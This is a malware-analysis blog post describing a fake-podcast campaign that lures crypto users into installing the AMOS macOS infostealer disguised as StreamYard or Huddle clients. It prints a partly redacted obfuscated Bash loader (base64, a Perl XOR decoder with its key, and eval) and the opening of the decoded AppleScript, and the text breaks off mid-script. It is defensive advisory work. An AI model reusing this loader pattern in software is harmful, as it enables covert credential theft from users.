xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>You were going to be a crypto superstar, invited to a top-notch podcast, but instead you ended up with all your credentials being sold on darknet markets.</p><p>That could already have been a true cybercrime podcast episode, but luckily we are here to turn it into a cybercrime article and an advisory to help you avoid becoming a victim.</p><p>Let&#8217;s talk about the <strong>Fake Podcast Malware Campaign.</strong></p><div><hr></div><h2>A fake podcast</h2><p>It all started with a script we are all familiar with by now: a DM on a social platform asking people in the crypto space to join a podcast episode about themselves and the projects they are currently working on. A classic move, but if they are still pulling it out maybe it&#8217;s because it works.</p><p>After the formalities are set, the victims are lured to fake websites impersonating online meeting platforms such as StreamYard or Huddle. Once on these faux platforms, an error message is displayed saying <em>something went wrong</em> (either the browser is incompatible or it cannot connect to the platform) and that a desktop client should be downloaded and installed.</p><p>A DMG (a macOS application installation disk) is then downloaded, posing as either Huddle or StreamYard.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XWc-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XWc-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 424w, https://substackcdn.com/image/fetch/$s_!XWc-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 848w, https://substackcdn.com/image/fetch/$s_!XWc-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 1272w, https://substackcdn.com/image/fetch/$s_!XWc-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XWc-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png" width="554" height="432.62225274725273" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7af355e4-82e7-4932-9682-862be75fb440_1824x1424.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1137,&quot;width&quot;:1456,&quot;resizeWidth&quot;:554,&quot;bytes&quot;:502611,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7af355e4-82e7-4932-9682-862be75fb440_1824x1424.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!XWc-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 424w, https://substackcdn.com/image/fetch/$s_!XWc-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 848w, https://substackcdn.com/image/fetch/$s_!XWc-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 1272w, https://substackcdn.com/image/fetch/$s_!XWc-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd5d7d49b-2de3-4925-b2cf-237be8e0f9b4_1824x1424.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But this is, in fact, Atomic macOS Stealer, better known as AMOS, and the only thing it will connect us with is a darknet market to sell our login credentials and cookies.</p><p>Scalpel please. Time to conduct dangerous, unlicensed and semi-legal surgical practices.</p><p></p><div><hr></div><h2>Gutting out AMOS Stealer Loader</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!E6wY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!E6wY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!E6wY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!E6wY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!E6wY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!E6wY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png" width="372" height="372" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:372,&quot;bytes&quot;:2180271,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!E6wY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!E6wY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!E6wY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!E6wY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6a705275-f05e-4d90-9e6a-8ba84c656d91_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Atomic macOS Stealer, or AMOS, is an advanced information stealer aimed at swiping your login artefacts, including credentials and cookies. It was spotted being distributed via creative, up-to-date methods such as ClickFix and by mimicking trending brands and products like DeepSeek. Once deployed, say goodbye to your accounts; expect impersonation around the world and, basically, the loss of your entire digital life, from banking apps to gaming platforms.</p><p>In this case it was distributed as DMG installation files, let&#8217;s pry them open:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vWYV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vWYV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 424w, https://substackcdn.com/image/fetch/$s_!vWYV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 848w, https://substackcdn.com/image/fetch/$s_!vWYV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 1272w, https://substackcdn.com/image/fetch/$s_!vWYV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vWYV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png" width="1456" height="937" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a9e5c43b-8566-4970-b5ec-b5acda9acf67_1772x1140.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:937,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:598931,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa9e5c43b-8566-4970-b5ec-b5acda9acf67_1772x1140.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vWYV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 424w, https://substackcdn.com/image/fetch/$s_!vWYV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 848w, https://substackcdn.com/image/fetch/$s_!vWYV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 1272w, https://substackcdn.com/image/fetch/$s_!vWYV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4ecb2cfd-80d2-4457-be1f-16e571ad7274_1772x1140.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>First things first, our threat actor forgot a .DS_Store file, which often contains valuable &#8216;easter eggs&#8217;, not necessarily suitable as actionable intel but rather useful settings. A strings scan shows the project was originally nicknamed infosec_hello.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!07vz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!07vz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 424w, https://substackcdn.com/image/fetch/$s_!07vz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 848w, https://substackcdn.com/image/fetch/$s_!07vz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 1272w, https://substackcdn.com/image/fetch/$s_!07vz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!07vz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png" width="1456" height="937" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/70dd1d59-4936-4b21-8a08-c25e54c66e7a_1772x1140.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:937,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:433062,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70dd1d59-4936-4b21-8a08-c25e54c66e7a_1772x1140.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!07vz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 424w, https://substackcdn.com/image/fetch/$s_!07vz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 848w, https://substackcdn.com/image/fetch/$s_!07vz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 1272w, https://substackcdn.com/image/fetch/$s_!07vz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91f0fc24-453d-4da6-afd7-af57c136f385_1772x1140.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>See those files with weird extensions like .Iwv and .Ztz? </p><p>Those are Bash scripts disguised as something else!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Nudc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Nudc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 424w, https://substackcdn.com/image/fetch/$s_!Nudc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 848w, https://substackcdn.com/image/fetch/$s_!Nudc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 1272w, https://substackcdn.com/image/fetch/$s_!Nudc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Nudc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png" width="1456" height="355" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:355,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:216792,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/173846074?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Nudc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 424w, https://substackcdn.com/image/fetch/$s_!Nudc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 848w, https://substackcdn.com/image/fetch/$s_!Nudc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 1272w, https://substackcdn.com/image/fetch/$s_!Nudc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb16c48e7-c475-4086-8d51-f80e440e8d52_1884x460.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Both samples contain heavily base64 obfuscated code that is later decoded and <em>XORed</em> via Perl:</p><pre><code>#!/bin/bash

if false; then
    EiqLwP=701
    jMVppY=443
    vNcakstx() {
        local var=578
        return 0
    }
    ufuhgwOg() {
        local var=653
        return 0
    }
    echo 'DulhopPRRO'
fi

EmZCKs() { echo "$1" | base64 --decode; }

#[...] Snippet removed by Mauro

iRXoEI=$(echo "$ZBoaKw" | base64 --decode | perl -e 'my $key = pack("H*", "da7db7be616a94cc46357f272a1408b0"); my $data = do { local $/; &lt;STDIN&gt; }; my $k = length($key); for(my $i=0; $i &lt; length($data); $i++){ print chr( ord(substr($data, $i, 1)) ^ ord(substr($key, $i % $k, 1)) ); }')
EAhJHD=$(EmZCKs "$iRXoEI")
eval "$EAhJHD" </code></pre><p>But what does this code do? Well, the chain is the following:</p><blockquote><p><em>&#128190; DMG File &gt; &#9000;&#65039; Bash Script &gt; </em></p><p><em>&#127917; Base64 &gt; &#128256; Perl XOR &gt; &#127917; Base64 &gt; &#127823; AppleScript</em></p></blockquote><p>So, it actually loads an AppleScript via <em>osascript</em>:</p><pre><code>osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "Huddle" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
